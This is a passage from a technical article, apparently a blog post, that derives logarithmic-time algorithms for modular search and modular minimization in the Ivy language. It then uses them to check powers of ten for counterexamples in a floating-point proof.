Vern Paxson and Tim Peters (the “<a href="#related">Related Work</a>” section explains the differences).
The first step is to solve the “modular search” problem of finding the minimum <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> (the “first” <math><mi>x</mi></math>)
such that <math><mrow><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
The second step is to use that solution to solve the “modular minimum” problem of
finding an <math><mi>x</mi></math> in a given range that minimizes <math><mrow><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>.
<a class=anchor href="#modfirst"><h2 id="modfirst">Modular Search</h2></a>
<p>
Given constants <math><mi>c</mi></math>, <math><mi>m</mi></math>, <math><MI>𝑙𝑜</MI></math>, and <math><mtext><i>hi</i></mtext></math>, we want to find the minimum <math><mrow><mi>x</mi><mo>≥</mo><mn>0</mn></mrow></math> (the “first” <math><mi>x</mi></math>) such that <math><mrow><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
This is an old programming contest problem, and I am not sure whether it has a formal name.
There are multiple ways to derive a GCD-like efficient solution.
The following explanation, based on <a href="https://codeforces.com/blog/entry/90690?#comment-791032">one by David Wärn</a>,
is the simplest I am aware of.
<p>
Here is a correct <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo></mrow></math> iterative algorithm:
<pre>op modfirst (c m lo hi) =
xr x cx mx = 0 0 1 0
:while 1
# (A) xr ≤ hi but perhaps xr < lo.
:while xr < lo
xr x = xr x + c cx
:end
xr <= hi: x
# (B) xr - c < lo ≤ hi < xr
:while xr > hi
xr x = xr x + (-m) mx
:end
lo <= xr: x
# (C) xr < lo ≤ hi < xr + m
x >= m: -1
:end
</pre>
<p>
The algorithm walks <math><mi>x</mi></math> forward from 0, maintaining <math><mrow><MI>𝑥𝑟</MI><mo>=</mo><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>:
<ul>
<li>
When <math><MI>𝑥𝑟</MI></math> is too small, it adds <math><mi>c</mi></math> to <math><MI>𝑥𝑟</MI></math> and increments <math><mi>x</mi></math> (<math><mrow><mi>c</mi><mi>x</mi><mo>=</mo><mn>1</mn></mrow></math>).
<li>
When <math><MI>𝑥𝑟</MI></math> is too large, it subtracts <math><mi>m</mi></math> from <math><MI>𝑥𝑟</MI></math> and leaves <math><mi>x</mi></math> unchanged (<math><mrow><mi>m</mi><mi>x</mi><mo>=</mo><mn>0</mn></mrow></math>).
<li>
When <math><mi>x</mi></math> reaches <math><mi>m</mi></math>, it gives up: there is no answer.</ul>
<p>
This loop is easily verified to be correct:
<ul>
<li>
It starts with <math><mrow><mi>x</mi><mo>=</mo><mn>0</mn></mrow></math> and considers successive <math><mi>x</mi></math> one at a time.
<li>
While doing that, it maintains <math><MI>𝑥𝑟</MI></math> correctly:
<ul>
<li>
If <math><MI>𝑥𝑟</MI></math> is too small, we <i>must</i> add a <math><mi>c</mi></math> (and increment <math><mi>x</mi></math>).
<li>
If <math><MI>𝑥𝑟</MI></math> is too large, we <i>must</i> subtract an <math><mi>m</mi></math> (and leave <math><mi>x</mi></math> alone).</ul>
<li>
If <math><mrow><MI>𝑥𝑟</MI><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>, it notices and stops.</ul>
<p>
The only problem with this <code>modfirst</code> is that it is unbearably slow,
but we can speed it up.
<p>
At (A), <math><mrow><mi>x</mi><mi>r</mi><mo>≤</mo><mi>h</mi><mi>i</mi></mrow></math>,
established by the initial <math><mrow><mi>x</mi><mi>r</mi><mo>=</mo><mn>0</mn></mrow></math> or by the end of the previous iteration.
<p>
At (B), <math><mrow><MI>𝑥𝑟</MI><mo>−</mo><mi>c</mi><mo><</mo><MI>𝑙𝑜</MI><mo>≤</mo><mtext><i>hi</i></mtext><mo><</mo><MI>𝑥𝑟</MI></mrow></math>.
Because <math><mrow><MI>𝑥𝑟</MI><mo>−</mo><mi>c</mi><mo><</mo><MI>𝑙𝑜</MI></mrow></math>, subtracting <math><mrow><mi>m</mi><mo>≥</mo><mi>c</mi></mrow></math> will
make <math><MI>𝑥𝑟</MI></math> too small; that will always be followed by at least
<math><mrow><mo stretchy=false>⌊</mo><mi>m</mi><mn>/</mn><mi>c</mi><mo stretchy=false>⌋</mo></mrow></math> additions of <math><mi>c</mi></math>.
So we might as well replace <math><mi>m</mi></math> with <math><mrow><mi>m</mi><mo>−</mo><mi>c</mi><mo>·</mo><mrow><mo stretchy=false>⌊</mo><mi>m</mi><mn>/</mn><mi>c</mi><mo stretchy=false>⌋</mo></mrow></mrow></math>,
speeding future trials.
We will also have to update <math><MI>𝑚𝑥</MI></math>, to make sure <math><mi>x</mi></math> is maintained correctly.
<p>
At (C),
<math><mrow><MI>𝑥𝑟</MI><mo>≤</mo><mtext><i>hi</i></mtext><mo><</mo><MI>𝑥𝑟</MI><mo>+</mo><mi>m</mi></mrow></math>,
and by a similar argument, we might as well replace
<math><mi>c</mi></math> with <math><mrow><mi>c</mi><mo>−</mo><mi>m</mi><mo>·</mo><mrow><mo stretchy=false>⌊</mo><mi>c</mi><mn>/</mn><mi>m</mi><mo stretchy=false>⌋</mo></mrow></mrow></math>,
updating <math><MI>𝑐𝑥</MI></math> as well.
<p>
Making both changes to our code, we get:
<pre><span style="color: #aaa">op modfirst (c m lo hi) =</span>
<span style="color: #aaa"> xr x cx mx = 0 0 1 0</span>
<span style="color: #aaa"> :while 1</span>
<span style="color: #aaa"> # (A) xr ≤ hi but perhaps xr < lo.</span>
<span style="color: #aaa"> :while xr < lo</span>
<span style="color: #aaa"> xr x = xr x + c cx</span>
<span style="color: #aaa"> :end</span>
<span style="color: #aaa"> xr <= hi: x</span>
<span style="color: #aaa"> # (B) xr - c < lo ≤ hi < xr</span>
m mx = m mx + (-c) cx * floor m/c
m == 0: -1
<span style="color: #aaa"> :while xr > hi</span>
<span style="color: #aaa"> xr x = xr x + (-m) mx</span>
<span style="color: #aaa"> :end</span>
<span style="color: #aaa"> lo <= xr: x</span>
c cx = c cx + (-m) mx * floor c/m
c == 0: -1
# (C) xr < lo ≤ hi < xr+m
<span style="color: #aaa"> :end</span>
</pre>
<p>
Notice that the loop is iterating (among other things)
<math><mrow><mi>m</mi><mo>=</mo><mi>m</mi><MO>mod</MO><mi>c</mi></mrow></math> and <math><mrow><mi>c</mi><mo>=</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>,
the same as Euclid’s GCD algorithm,
so <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mspace width='0.3em' /></msub><mspace width='0.166em' /></mrow><mi>c</mi><mo stretchy=false>)</mo></mrow></math> iterations will zero <math><mi>c</mi></math> or <math><mi>m</mi></math>.
The old test for <math><mrow><mi>x</mi><mo>≥</mo><mi>m</mi></mrow></math> (made incorrect by modifying <math><mi>m</mi></math>)
is replaced by checking for <math><mi>c</mi></math> or <math><mi>m</mi></math> becoming zero.
<p>
Finally, we should optimize away the small <code>while</code> loops by calculating how many times each will be executed:
<pre><span style="color: #aaa">op modfirst (c m lo hi) =</span>
<span style="color: #aaa"> xr x cx mx = 0 0 1 0</span>
<span style="color: #aaa"> :while 1</span>
<span style="color: #aaa"> # (A) xr ≤ hi but perhaps xr < lo.</span>
xr x = xr x + c cx * ceil (0 max lo-xr)/c
<span style="color: #aaa"> xr <= hi: x</span>
<span style="color: #aaa"> # (B) xr - c < lo ≤ hi < xr</span>
<span style="color: #aaa"> m mx = m mx + (-c) cx * floor m/c</span>
<span style="color: #aaa"> m == 0: -1</span>
xr x = xr x + (-m) mx * ceil (0 max xr-hi)/m
<span style="color: #aaa"> lo <= xr: x</span>
<span style="color: #aaa"> c cx = c cx + (-m) mx * floor c/m</span>
<span style="color: #aaa"> c == 0: -1</span>
<span style="color: #aaa"> # (C) xr < lo ≤ hi < xr+m</span>
<span style="color: #aaa"> :end</span>
</pre>
<p>
Each iteration of the outer <code>while</code> loop is now <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math>,
and the loop runs at most <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mspace width='0.3em' /></msub><mspace width='0.166em' /></mrow><mi>c</mi><mo stretchy=false>)</mo></mrow></math> times,
giving a total time of <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mspace width='0.3em' /></msub><mspace width='0.166em' /></mrow><mi>c</mi><mo stretchy=false>)</mo></mrow></math>,
dramatically better than the old <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mi>m</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
We can reformat the code to highlight the regular structure:
<pre class='language-ivy'>op modfirst (c m lo hi) =
xr x cx mx = 0 0 1 0
:while 1
xr x = xr x + c cx * ceil (0 max lo-xr)/c ; xr <= hi : x
m mx = m mx + (-c) cx * floor m/c ; m == 0 : -1
xr x = xr x + (-m) mx * ceil (0 max xr-hi)/m ; lo <= xr : x
c cx = c cx + (-m) mx * floor c/m ; c == 0 : -1
:end
(modfirst 13 256 1 5) is 20 # 20*13 mod 256 = 4 ∈ [1, 5]
(modfirst 14 256 1 1) is -1 # impossible
</pre>
<p>
We can also check that <code>modfirst</code> finds the exact answer from case 2,
namely powers of five zeroing out the middle.
<pre class='language-ivy'>(modfirst (pm -3) (2**128) 1 (2**64)) is 125
spaced hex 125 * (pm -3)
-- out --
0x40 0000000000000000 0000000000000042
</pre>
<a class=anchor href="#modular_minimization"><h2 id="modular_minimization">Modular Minimization</h2></a>
<p>
Now we can solve the problem of finding the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that minimizes <math><mrow><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math>.
<p>
Define the notation <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mi>x</mi><mo>·</mo><mi>c</mi><MO>mod</MO><mi>m</mi></mrow></math> (the “residue” of <math><mi>x</mi></math>).
We can construct <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with minimal <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> with the following greedy algorithm.
<ol>
<li>
Start with <math><mrow><mi>x</mi><mo>=</mo><MI>𝑥𝑚𝑖𝑛</MI></mrow></math>.
<li>
Find the first <math><mrow><mi>y</mi><mo>∈</mo><mo stretchy=false>[</mo><mi>x</mi><mo>+</mo><mn>1</mn><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> such that <math><mrow><mi>y</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo><</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
<li>
If no such <math><mi>y</mi></math> exists, return <math><mi>x</mi></math>.
<li>
Set <math><mrow><mi>x</mi><mo>=</mo><mi>y</mi></mrow></math>.
<li>
Go to step 2.</ol>
<p>
The algorithm finds the right answer, because it starts at <math><MI>𝑥𝑚𝑖𝑛</MI></math> and then steps through
every successively better answer along the way to <math><MI>𝑥𝑚𝑎𝑥</MI></math>.
The algorithm terminates because every search is finite and every step moves <math><mi>x</mi></math> forward by at least 1.
The only detail remaining is how to implement step 2.
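<p>
Before turning to step 2, here is the walk on a toy case, <math><mrow><mi>c</mi><mo>=</mo><mn>13</mn></mrow></math> and <math><mrow><mi>m</mi><mo>=</mo><mn>255</mn></mrow></math> over <math><mrow><mo stretchy=false>[</mo><mn>10</mn><mo>,</mo><mn>25</mn><mo stretchy=false>]</mo></mrow></math> (the same numbers as the <code>modmin</code> test below):
<pre class='language-ivy'># x*13 mod 255 for x = 10..25: the walk starts at x=10 (residue 130),
# jumps to x=20 (residue 5), and no later x in the range does better.
(((seq 10 25) * 13) mod 255) is 130 143 156 169 182 195 208 221 234 247 5 18 31 44 57 70
</pre>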
<p>
For any <math><mi>x</mi></math> and <math><mi>y</mi></math>, <math><mrow><mo stretchy=false>(</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>−</mo><mi>y</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo stretchy=false>)</mo><MO>mod</MO><mi>m</mi><mo>=</mo><mo stretchy=false>(</mo><mi>x</mi><mo>−</mo><mi>y</mi><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>, because multiplication distributes over subtraction.
Call that the <i>subtraction lemma</i>.
<p>
Finding the first <math><mrow><mi>y</mi><mo>∈</mo><mo stretchy=false>[</mo><mi>x</mi><mo>+</mo><mn>1</mn><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> with <math><mrow><mi>y</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo><</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>
is equivalent to finding the first <math><mrow><mi>d</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>1</mn><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo>−</mo><mi>x</mi><mo stretchy=false>]</mo></mrow></math> with <math><mrow><mo stretchy=false>(</mo><mi>x</mi><mo>+</mo><mi>d</mi><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo><</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
By the subtraction lemma, <math><mrow><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mo stretchy=false>(</mo><mo stretchy=false>(</mo><mi>x</mi><mo>+</mo><mi>d</mi><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo>−</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo stretchy=false>)</mo><MO>mod</MO><mi>m</mi></mrow></math>,
so we are looking for the first <math><mrow><mi>d</mi><mo>≥</mo><mn>1</mn></mrow></math> with <math><mrow><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><mi>m</mi><mo>−</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>,</mo><mi>m</mi><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>.
That’s what <code>modfirst</code> does, except it searches <math><mrow><mi>d</mi><mo>≥</mo><mn>0</mn></mrow></math>.
But <math><mrow><mn>0</mn><msub><mspace height='0em' /><mi>R</mi></msub><mo>=</mo><mn>0</mn></mrow></math> and we will only search for <math><mrow><MI>𝑙𝑜</MI><mo>≥</mo><mn>1</mn></mrow></math>, so
<code>modfirst</code> can safely start its search at <math><mn>0</mn></math>.
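<p>
As a spot check of this reduction on the same toy case: at <math><mrow><mi>x</mi><mo>=</mo><mn>10</mn></mrow></math> the residue is 130, so we want the first <math><mi>d</mi></math> whose residue lands between <math><mrow><mn>255</mn><mo>−</mo><mn>130</mn><mo>=</mo><mn>125</mn></mrow></math> and 254; that is <math><mrow><mi>d</mi><mo>=</mo><mn>10</mn></mrow></math>, and stepping to <math><mrow><mi>x</mi><mo>+</mo><mi>d</mi><mo>=</mo><mn>20</mn></mrow></math> improves the residue from 130 to 5:
<pre class='language-ivy'>(modfirst 13 255 125 254) is 10
((20*13) mod 255) is 5
</pre>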
<p>
Note that if <math><mrow><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><mi>m</mi><mo>−</mo><mo stretchy=false>(</mo><mi>x</mi><mo>+</mo><mi>d</mi><mo stretchy=false>)</mo><msub><mspace height='0em' /><mi>R</mi></msub><mo>,</mo><mi>m</mi><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>, the next iteration will choose the same <math><mi>d</mi></math>—any better answer would have been an answer to the original search.
So after finding <math><mi>d</mi></math>, we should add it to <math><mi>x</mi></math> as many times as we can.
<p>
The full algorithm is then:
<ol>
<li>
Start with <math><mrow><mi>x</mi><mo>=</mo><MI>𝑥𝑚𝑖𝑛</MI></mrow></math>.
<li>
Use <code>modfirst</code> to find the first <math><mrow><mi>d</mi><mo>≥</mo><mn>0</mn></mrow></math> such that <math><mrow><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><mi>m</mi><mo>−</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>,</mo><mi>m</mi><mo>−</mo><mn>1</mn><mo stretchy=false>]</mo></mrow></math>.
<li>
If no <math><mi>d</mi></math> exists or <math><mrow><mi>x</mi><mo>+</mo><mi>d</mi><mo>></mo><MI>𝑥𝑚𝑎𝑥</MI></mrow></math>, stop and return <math><mi>x</mi></math>. Otherwise continue.
<li>
Let <math><mrow><mi>s</mi><mo>=</mo><mi>m</mi><mo>−</mo><mi>d</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>, the number we are effectively subtracting from <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>.
<li>
Let <math><mi>n</mi></math> be the smaller of <math><mrow><mo stretchy=false>⌊</mo><mo stretchy=false>(</mo><MI>𝑥𝑚𝑎𝑥</MI><mo>−</mo><mi>x</mi><mo stretchy=false>)</mo><mn>/</mn><mi>d</mi><mo stretchy=false>⌋</mo></mrow></math> (the most times we can add <math><mi>d</mi></math> to <math><mi>x</mi></math>
before exceeding our limit) and <math><mrow><mo stretchy=false>⌊</mo><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mn>/</mn><mi>s</mi><mo stretchy=false>⌋</mo></mrow></math> (the most times we can subtract <math><mi>s</mi></math> from <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>
before wrapping around).
<li>
Set <math><mrow><mi>x</mi><mo>=</mo><mi>x</mi><mo>+</mo><mi>d</mi><mo>·</mo><mi>n</mi></mrow></math>.
<li>
Go to step 2.</ol>
<p>
In Ivy, that algorithm is:
<pre class='language-ivy'>op modmin (xmin xmax c m) =
x = xmin
:while 1
xr = (x*c) mod m
d = modfirst c m, m - xr 1
(d < 0) or (x+d) > xmax: x
s = m - (d*c) mod m
x = x + d * floor ((xmax-x)/d) min xr/s
:end
(modmin 10 25 13 255) is 20
</pre>
<p>
The running time of <code>modmin</code> depends on what limits <math><mi>n</mi></math>.
If <math><mi>n</mi></math> is limited by <math><mrow><mo stretchy=false>(</mo><MI>𝑥𝑚𝑎𝑥</MI><mo>−</mo><mi>x</mi><mo stretchy=false>)</mo><mn>/</mn><mi>d</mi></mrow></math>
then the next iteration will not find a usable <math><mi>d</mi></math>,
since any future <math><mi>d</mi></math> would have to be bigger than the one we just found,
and there won’t be room to add it.
On the other hand, if <math><mi>n</mi></math> is limited by <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mn>/</mn><mi>s</mi></mrow></math>,
then it means we reduced <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math> at least by half.
That limits the number of iterations to <math><mrow><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mi>m</mi></mrow></math>,
and since <code>modfirst</code> is <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mrow></mrow></msub><mspace width='0.166em' /></mrow><mi>m</mi><mo stretchy=false>)</mo></mrow></math>, <code>modmin</code> is
<math><mrow><mi>O</mi><mo stretchy=false>(</mo><mtext>log</mtext><msup><mspace height='0.66em' /><mn>2</mn></msup><mspace width='0.166em' /><mi>m</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
The subtraction lemma and <code>modfirst</code> let us build other useful operations too.
One obvious variant of <code>modmin</code> is <code>modmax</code>, which finds the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> that maximizes <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub></mrow></math>
and also runs in <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mtext>log</mtext><msup><mspace height='0.66em' /><mn>2</mn></msup><mspace width='0.166em' /><mi>m</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
We can extend <code>modmin</code> to minimize <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math> instead,
by stepping to the first <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>≥</mo><MI>𝑙𝑜</MI></mrow></math> before looking for improvements:
<pre class='language-ivy'>op modminge (xmin xmax c m lo) =
x = xmin
:if (xr = (x*c) mod m) < lo
d = modfirst c m (lo-xr) ((m-1)-xr)
d < 0: :ret -1
x = x + d
:end
:while 1
xr = (x*c) mod m
d = modfirst c m (m-(xr-lo)) (m-1)
(d < 0) or (x+d) > xmax: x
s = m - (d*c) mod m
x = x + d * floor ((xmax-x)/d) min (xr-lo)/s
:end
op modmin (xmin xmax c m) = modminge xmin xmax c m 0
(modmin 10 25 13 255) is 20
(modminge 10 25 13 255 6) is 21
(modminge 1 20 13 255 6) is 1
(modminge 10 20 255 255 1) is -1
</pre>
<p>
We can also invert the search to produce <code>modmax</code> and <code>modmaxle</code>:
<pre class='language-ivy'>op modmaxle (xmin xmax c m hi) =
x = xmin
:if (xr = (x*c) mod m) > hi
d = modfirst c m (m-xr) ((m-xr)+hi)
d < 0: :ret -1
x = x + d
:end
:while 1
xr = (x*c) mod m
d = modfirst c m 1 (hi-xr)
(d < 0) or (x+d) > xmax: x
s = (d*c) mod m
x = x + d * floor ((xmax-x)/d) min (hi-xr)/s
:end
op modmax (xmin xmax c m) = modmaxle xmin xmax c m (m-1)
(modmax 10 25 13 255) is 19
(modmaxle 10 25 13 255 200) is 15
</pre>
<p>
Another variant is <code>modfind</code>, which finds the first <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> such that <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
It doesn’t need a loop at all:
<pre class='language-ivy'>op modfind (xmin xmax c m lo hi) =
x = xmin
xr = (x*c) mod m
(lo <= xr) and xr <= hi: x
d = modfirst c m, (lo hi - xr) mod m
(d < 0) or (x+d) > xmax: -1
x+d
(modfind 21 100 13 256 1 10) is 40
</pre>
<p>
We can also build <code>modfindall</code>, which finds all the <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑥𝑚𝑖𝑛</MI><mo>,</mo><MI>𝑥𝑚𝑎𝑥</MI><mo stretchy=false>]</mo></mrow></math> such that <math><mrow><mi>x</mi><msub><mspace height='0em' /><mi>R</mi></msub><mo>∈</mo><mo stretchy=false>[</mo><MI>𝑙𝑜</MI><mo>,</mo><mtext><i>hi</i></mtext><mo stretchy=false>]</mo></mrow></math>.
Because there might be a very large number of them, it stops after finding the first 100.
<pre class='language-ivy'>op modfindall (xmin xmax c m lo hi) =
all = ()
:while 1
x = modfind xmin xmax c m lo hi
x < 0: all
all = all, x
(count all) >= 100: all
xmin = x+1
:end
(modfindall 21 100 13 256 1 10) is 40 79 99
</pre>
<p>
Because <code>modfind</code> and <code>modfindall</code> both call <code>modfirst</code> <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math> times,
they both run in <math><mrow><mi>O</mi><mo stretchy=false>(</mo><mtext>log</mtext><mspace width='0.166em' /><mi>m</mi><mo stretchy=false>)</mo></mrow></math> time.
<a class=anchor href="#modular_proof"><h2 id="modular_proof">Modular Proof</h2></a>
<p>
Now we are ready to analyze individual powers.
<p>
For a given <math><MI>𝑝𝑚</MI></math>, <math><mi>b</mi></math>, and <math><mi>m</mi></math>,
we want to verify that for all <math><mrow><mi>x</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><mo>−</mo><mn>1</mn></mrow></msup><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>)</mo></mrow></math>,
we have <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn></mrow></math>,
or equivalently, <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi></mrow></msup><mo>≥</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup></mrow></math>.
We can use either <code>modmin</code> or <code>modfind</code> to do this.
Let’s use <code>modmin</code>, so we can show how close we came to
failing.
<p>
We’ll start with a function <code>check1</code> to check a single power,
and <code>show1</code> to format its result:
<pre class='language-ivy'># (b m) check1 p returns (p pm x middle fail) where pm is (pm p).
# If there is a counterexample to p, x is the first one,
# middle is (x*pm)'s middle bits, and fail is 1.
# If there is no counterexample, x middle fail are 0 0 0.
op (b m) check1 p =
x = modmin (2**b-1) ((2**b)-1) (pm p) (2**b+m)
middle = ((x * pm p) mod 2**b+m) >> b
p (pm p) x middle (middle < 2)
# show1 formats the result of check1.
op show1 (p pm x middle fail) =
p (hex pm) (hex x) (hex middle) ('.❌'[fail])
show1 64 64 check1 200
-- out --
200 0xa738c6bebb12d16cb428f8ac016561dc 0xffe389b3cdb6c3d0 0x34 .
</pre>
<p>
For <math><mrow><mi>p</mi><mo>=</mo><mn>200</mn></mrow></math>, no 64-bit input produces a 64-bit middle less than 2.
<p>
On the other hand, for <math><mrow><mi>p</mi><mo>=</mo><MO form='prefix'>−</MO><mn>1</mn></mrow></math>, we can verify that <code>check1</code> finds a multiple of 5 that zeroes the middle:
<pre class='language-ivy'>show1 64 64 check1 -1
-- out --
-1 0xcccccccccccccccccccccccccccccccd 0x8000000000000002 0x0 ❌
</pre>
<p>
Let’s check more than one power, gathering the results into a matrix:
<pre class='language-ivy'>op (b m) check ps = mix b m check1@ ps
op show table = mix show1@ table
show 64 64 check seq 25 35
-- out --
25 0x84595161401484a00000000000000000 0x8000000000000000 0x0 ❌
26 0xa56fa5b99019a5c80000000000000000 0x8000000000000000 0x0 ❌
27 0xcecb8f27f4200f3a0000000000000000 0x8000000000000000 0x0 ❌
28 0x813f3978f89409844000000000000000 0xec03c1a1aa24cc97 0x1 ❌
29 0xa18f07d736b90be55000000000000000 0xe06076f9cb96fe0d 0x5 .
30 0xc9f2c9cd04674edea400000000000000 0xfbd9be9d5bc8934e 0x1 ❌
31 0xfc6f7c40458122964d00000000000000 0x93997b98618e62a1 0x0 ❌
32 0x9dc5ada82b70b59df020000000000000 0xd0808609f474615a 0x2 .
33 0xc5371912364ce3056c28000000000000 0xc97002677c2de03f 0x0 ❌
34 0xf684df56c3e01bc6c732000000000000 0xc97002677c2de03f 0x0 ❌
35 0x9a130b963a6c115c3c7f400000000000 0xfd073be688a7dbaa 0x3 .
</pre>
<p>
Now let’s write code to show just the start and end of a table,
to avoid very long outputs:
<pre class='language-ivy'>op short table =
(count table) <= 15: table
(5 take table) ,% ((count table[0]) rho box '...') ,% (-5 take table)
short show 64 64 check seq 25 95
-- out --
25 0x84595161401484a00000000000000000 0x8000000000000000 0x0 ❌
26 0xa56fa5b99019a5c80000000000000000 0x8000000000000000 0x0 ❌
27 0xcecb8f27f4200f3a0000000000000000 0x8000000000000000 0x0 ❌
28 0x813f3978f89409844000000000000000 0xec03c1a1aa24cc97 0x1 ❌
29 0xa18f07d736b90be55000000000000000 0xe06076f9cb96fe0d 0x5 .
... ... ... ... ...
91 0x9d174b2dcec0e47b62eb0d64283f9c77 0xde861b1f480d3b9e 0x1 ❌
92 0xc45d1df942711d9a3ba5d0bd324f8395 0xe621cb57290a897f 0x0 ❌
93 0xf5746577930d6500ca8f44ec7ee3647a 0xa6bc10ca9dd53eff 0x1 ❌
94 0x9968bf6abbe85f207e998b13cf4e1ecc 0xd011cce372153a65 0x0 ❌
95 0xbfc2ef456ae276e89e3fedd8c321a67f 0xa674a3e92810fb84 0x0 ❌
</pre>
<p>
